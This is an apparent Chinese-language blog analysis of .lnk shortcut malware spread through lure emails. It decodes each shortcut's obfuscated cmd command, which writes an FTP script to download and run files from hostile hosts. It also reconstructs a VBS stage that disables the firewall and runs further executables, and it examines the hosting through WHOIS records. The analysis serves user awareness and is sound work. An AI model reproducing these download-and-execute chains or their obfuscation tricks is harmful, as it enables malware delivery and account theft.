跟據她傳來的檔案，很有趣的是，我在今年一月份也有收過類似的病毒信，也有寫了一篇簡單的介紹 : 病毒的花招 捷徑檔，我也有找到一篇文章是在介紹這種病毒

文章連結 : %Lnkget%

而到了現在，這樣的手法似乎有增無減，病毒的形式也有所變化，但是都有明顯的特點，信件內容都是繁體中文的，而主機、域名之類的都是來自中國大陸或台灣，在這背後有集團在運作，他的信件內容是這些

現在還在講露股溝妹ㄉ股溝妹已經落伍了～
告訴你瞎瞇叫蟑螂妹～
蟑螂妹
露後臀溝有什麼好大驚小怪ㄉ !
現在日本都已經在露前蟑螂鬚….實在有夠不雅ㄉ

而附加檔案是一個壓縮檔，裡面包著一個捷徑檔

對於一般人而言，對這種東西沒什麼警覺性，一般人都只知道.exe之類的很危險，可是這病毒用的是.lnk，而且他又可以設定看起來相關的圖示，加上內容吸引人，各式各樣的內容都有，有的說是照片，有的說是援交妹，甚至有些說"如何防止帳號被盜"，各種聳動或是引誘使用者去點擊的內容都有，但是一但你點了，下場自然就很慘，你的帳號可能會被盜走用來賣掉或偷偷登入來幹壞事，他可能會自動寄類似"我是援交妹，提供全套服務"或是其它類似的內容給你msn或其它網站裡的所有聯絡人，而那些人開了，又會再次的把病毒散播出去，中毒的人肯定會很困擾，以下是一些研究與分析

捷徑檔內容

捷徑檔的內容，像我在一月看到的一樣，是下載惡意程式來執行用的指令，有趣的是他還把視窗的大小以及字形設成最小來避免使用者發現，不同於一月的版本，在這次的版本中，他加了大量的替換變數，來讓指令非常難讀，除此之外，也可能是為了逃避防毒軟體的偵測

他的捷徑目標如下

%ComSpec% /c set q= t t.v&set a=z.c&set p=p.g&set h=p -s:z&set n=echo &echo %n%o ft%p%03%a%om^>z>j&echo %n%aa33^>^>z>>j&echo %n%bb33^>^>z>>j&echo %n%get%q%bs^>^>z>>j&echo %n%bye^>^>z>>j&echo ft%h%>>j&echo start t.vbs>>j&ren j s.bat&call s.bat&

經由整理後它的內容如下

echo echo o ftp.g03z.com^>z>j
echo echo aa33^>^>z>>j
echo echo bb33^>^>z>>j
echo echo get t t.vbs^>^>z>>j
echo echo bye^>^>z>>j
echo ftp -s:z>>j
echo start t.vbs>>j
ren j s.bat
call s.bat

簡單的來說，產生s.bat這個檔案並執行，而s.bat的檔案內容如下

s.bat:

echo o ftp.g03z.com>z
echo aa33>>z
echo bb33>>z
echo get t t.vbs>>z
echo bye>>z
ftp -s:z
start t.vbs

而這個s.bat又會去同一個ftp伺服器裡下載t.vbs這個檔案，然後執行

t.vbs:

sub k
for i=1 to UBound(s)
r=r&chr(s(i)-678)
next
Set kk = CreateObject("Wscript.Shell")
kk.run r,1
end sub
s=array(691,777,787,778,710,725,777,710,788,779,794,710,793,794,789,790,710,793,782,775,792,779,778,775,777,777,779,793,793,716,779,777,782,789,710,789,710,797,797,797,724,781,726,729,800,724,777,789,787,740,783,724,783,716,779,777,782,789,710,775,775,729,729,740,740,783,724,783,716,779,777,782,789,710,776,776,729,729,740,740,783,724,783,716,779,777,782,789,710,792,779,777,796,710,778,710,778,724,779,798,779,740,740,783,724,783,716,779,777,782,789,710,776,799,779,740,740,783,724,783,716,780,794,790,710,723,793,736,783,724,783,716,778,779,786,710,783,724,783,716,778,724,779,798,779,716,779,777,782,789,710,789,710,797,797,797,724,781,726,729,800,724,777,789,787,740,795,724,795,716,779,777,782,789,710,775,775,729,729,740,740,795,724,795,716,779,777,782,789,710,776,776,729,729,740,740,795,724,795,716,779,777,782,789,710,781,779,794,710,793,710,793,724,779,798,779,740,740,795,724,795,716,779,777,782,789,710,776,799,779,740,740,795,724,795,716,780,794,790,710,723,793,736,795,724,795,716,793,724,779,798,779,716,778,779,786,710,795,724,795,716,778,779,786,710,741,724,796,776,793,716,778,779,786,710,793,724,779,798,779,710,778,724,779,798,779,716,793,794,775,792,794,710,782,794,794,790,736,725,725,776,795,799,724,799,775,782,789,789,724,777,789,787,724,794,797,725,716,778,779,786,710,741,710,741,724,776,775,794)
k

它把要執行的指定ascii加過了678放在陣列s中，然後用vbs將指令還原就變成了這樣:

cmd /c net stop sharedaccess&echo o www.g03z.com>i.i&echo aa33>>i.i&echo bb33>>i.i&echo recv d d.exe>>i.i&echo bye>>i.i&ftp -s:i.i&del i.i&d.exe&echo o www.g03z.com>u.u&echo aa33>>u.u&echo bb33>>u.u&echo get s s.exe>>u.u&echo bye>>u.u&ftp -s:u.u&s.exe&del u.u&del ?.vbs&del s.exe d.exe&start http://buy.yahoo.com.tw/&del ? ?.bat

經整理過後

net stop sharedaccess
echo o www.g03z.com>i.i
echo aa33>>i.i
echo bb33>>i.i
echo recv d d.exe>>i.i
echo bye>>i.i
ftp -s:i.i
del i.i
d.exe

echo o www.g03z.com>u.u
echo aa33>>u.u
echo bb33>>u.u
echo get s s.exe>>u.u
echo bye>>u.u
ftp -s:u.u
s.exe

del u.u
del ?.vbs
del s.exe d.exe
start http://buy.yahoo.com.tw/
del ? ?.bat

經過了這又臭又長的繞這麼一大圈，在這次下載了d.exe和s.exe才是真正的病毒，兩個檔案並執行，然後刪除之前下載的所有東西，為什麼需要兩個檔案，這點我還沒有研究，接著它會開啟Yahoo! 奇摩拍賣的首頁，我猜他是想讓使用者輸入帳號密碼登入Yahoo!奇摩拍賣，然後先前裝好的病毒在一旁側錄帳號密碼，合理地懷疑，這病毒的目的可能是想偷Yahoo!奇摩拍賣的帳號，然後賣給詐騙集團，又或著這背後的集團本身就是詐騙集團，但也有可能只是想混淆視聽而已

之所以要繞這麼大一圈，我想其目的可能是想避免被研究，而最有趣的地方在於，他們都一直登入一個FTP主機，我們就來研究看看這到底是哪裡來的主機

來源的研究

註冊商 WHOIS 主機 : whois.paycenter.com.cn

The Data in Paycenter’s WHOIS database is provided by Paycenter
for information purposes, and to assist persons in obtaining
information about or related to a domain name registration record.
Paycenter does not guarantee its accuracy. By submitting
a WHOIS query, you agree that you will use this Data only
for lawful purposes and that,
under no circumstances will you use this Data to:
(1) allow, enable, or otherwise support the transmission
of mass unsolicited, commercial advertising or solicitations
via e-mail (spam); or
(2) enable high volume, automated, electronic processes that
apply to Paycenter or its systems.
Paycenter reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by this policy.

Domain Name : g03z.com
PunnyCode : g03z.com
Creation Date : 2009-01-08 16:50:39
Updated Date : 2009-01-08 16:50:39
Expiration Date : 2010-01-08 16:50:21

Registrant:
Organization : ggg zzz
Name : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234

Administrative Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86–02586883333
Fax : 86–02586883333
Email : web (a) zgsj.com

Technical Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86–02586883333
Fax : 86–02586883333
Email : web (a) zgsj.com

Billing Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86–02586883333
Fax : 86–02586883333
Email : web (a) zgsj.com

能得到的就只有是中國註冊的訊息，所有聯絡資料都是亂打的，當然要註冊網域來幹壞事應該沒有人蠢到會寫自己的聯絡資料上去，接著是主機的位置，解析後是

202.153.172.43

經由whois的資料可以發現，是台灣公司的主機

inetnum: 202.153.160.0 – 202.153.207.255
netname: UNIGATENET
descr: UnigateNet, Internet Service Provider,
descr: Taipei, Taiwan, R.O.C
country: TW
admin-c: FC159-AP
tech-c: CG195-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-TW-UNIGATE
remarks: This object can only be modified by APNIC hostmaster
remarks: If you wish to modify this object details please
remarks: send email to hostmaster (at) apnic.net with your organisation
remarks: account name in the subject line.
status: ALLOCATED PORTABLE
changed: hm-changed (at) apnic.net 20031024
changed: hm-changed (at) apnic.net 20060117
source: APNIC

person: Felix Chou
address: Chief Telecom Inc.
address: No.250, Yuang Guang St.,
address: Neihu Chiu, Taipei 114,
address: Taiwan, R.O.C.
country: TW
phone: +886-2-2657-6688
fax-no: +886-2-2797-2998
e-mail: felix (at) chief.com.tw
nic-hdl: FC159-AP
mnt-by: MAINT-TW-UNIGATE
changed: noah (at) chief.com.tw 20020715
changed: mark_lin (at) chief.com.tw 20060127
source: APNIC

person: Chief Group
address: UniGate Telecom Inc.
address: No.250, Yuang Guang St.,
address: Neihu Chiu, Taipei 114,
address: Taiwan, R.O.C.
country: TW
phone: +886-2-2657-6688
fax-no: +886-2-2657-6460
nic-hdl: CG195-AP
e-mail: felix_chou (at) chief.com.tw
e-mail: mark_lin (at) chief.com.tw
e-mail: apnic_admin (at) chief.com.tw
changed: mark_lin (at) chief.com.tw 20070521
mnt-by: MAINT-TW-UNIGATE
source: APNIC

看起來是一家叫是方電訊的公司，他有提供IDC的服務，另一個公司叫領航電信，不太清楚他們之間是什麼關係，不過看起來應該是被入侵的，直接連到http://202.55.242.9/也是領航電信的網頁，應該沒有笨蛋會拿自己的公司主機來幹壞事，諷刺的是，是方電訊的首頁擺了什麼資安碉堡防護系列的產品，而領航電信的網頁，下面有排跑馬燈這樣寫著

間碟軟體對電腦使用者之危害及影響宣導:為防止不肖人士利用間碟軟體竊取格人資料, 請網際網路接取用戶注意間碟軟體對於電腦使用的危害及影響.

嘖嘖，一個被入侵了還在賣資安產品，一個還提醒別人間諜軟體的危害，都不知道自己變成了幫兇….，我有找到其它提到這些資料的討論，他們說都已經回報了這些公司，不過到了今天一樣還在幫忙散播病毒，真不知道這些公司到底在幹什麼的，開著主機讓人散播病毒

最後

我相信在這背後的集團肯定跟詐騙集團有關係，這些.lnk病毒的風格和行為都大同小異，都同樣會透過信件以誘人開啟的內容散播，而且都是以盈利目的，其目的都是為了盜取遊戲的帳號密碼，或是盜取網拍帳密，偷走網拍資料，來供詐騙集團有訂單等資料讓受害者取信

我有想過如何不讓這種事情發生，例如試著攻擊那些提供病毒檔讓人下載的主機，讓他沒有辦法運作，但是安全性是0分的機器何其多，而像上文列出這些公司，不負責任把自己伺服器安全弄好的公司也很多，即使某個伺服器的服務被我阻斷了，在這背後的集團只要換一個伺服器就可以繼續犯案，而指望台灣或是中國大陸能逮到這些人大概也遙遙無期，中國大陸可是網路犯罪的天堂，所以最好的方法還是使用者要知道這些基本的知識，這是所有使用者的責任，為了你點開了病毒把病毒散播出去，可能某個人就因此這輩子的積蓄就此被騙光，你也是幫兇之一，因此，在這個騙子橫行的年代，要有基本的警覺，接著我會寫一篇文章來告訴大家一些基本該知道的知識

女性也射精的最新研究

女性在達到性高潮的一剎那，即陰道充血、膨脹到後期，
陰道平滑肌發生三至六次節律性收縮，會陰及全身的許
多肌群亦同時出現數次控制不住的痙攣性收縮，陰部的
脹滿感瞬間向全身放射，隨著高度的性快感，意識變得
模糊起來，部分女性可發出柔聲輕喚，而極個別女性可
伴有“射精”現象

然後附加了一個檔案

女性也射精的最新研究.lnk

一附就是我是病毒的樣子，看來是某個有我信箱的人中毒自動寄過來的病毒信，有趣的是，看到.lnk我直覺地想應該會開啟某個惡意網站，但是我另存來看看，發現我錯了

他捷徑的目標是這樣

"%windir%\system32\cmd.exe /c echo open tloaindm5.2288.org>>t.t&echo 123>>t.t&echo 123>>t.t&echo get down2.bat c:\down2.bat>>t.t&echo get vnet2.vbs %windir%\vnet2.vbs>>t.t&echo bye>>t.t&ftp -s:t.t&del t.t&start %windir%\vnet2.vbs&　　　　　　　　　　　　　　　　　　　　　"

後面接了一大串的空白，沒仔細看還以為是空白，原來字都在前面，這病毒還真是奸巧

他的目標執行的東西是這樣

echo open tloaindm5.2288.org >> t.t
echo 123>>t.t
echo 123>>t.t
echo get down2.bat c:\down2.bat>>t.t
echo get vnet2.vbs %windir%\vnet2.vbs>>t.t
echo bye>>t.t
ftp -s:t.t
del t.t
start %windir%\vnet2.vbs

所以他會建立一個t.t的檔案，然後用ftp指令執行，連到tloaindm5.2288.org接著下載down2.bat，然後是vnet2.vbs，我上去那個被開ftp都不知道的倒霉鬼的ftp站台參觀了一下，它的檔案有這些

病毒FTP的檔案內容

看到lineage.exe，一附就是衝著線上遊戲天堂來的，我猜他可能會把天堂的執行檔給替換掉之類的

沒有仔細繼續研究裡面的東西，有興趣的人自己繼續研究裡面的東西吧，lnk捷徑檔執行病毒的確是蠻有創意的，這年頭什麼檔案看來都不應該相信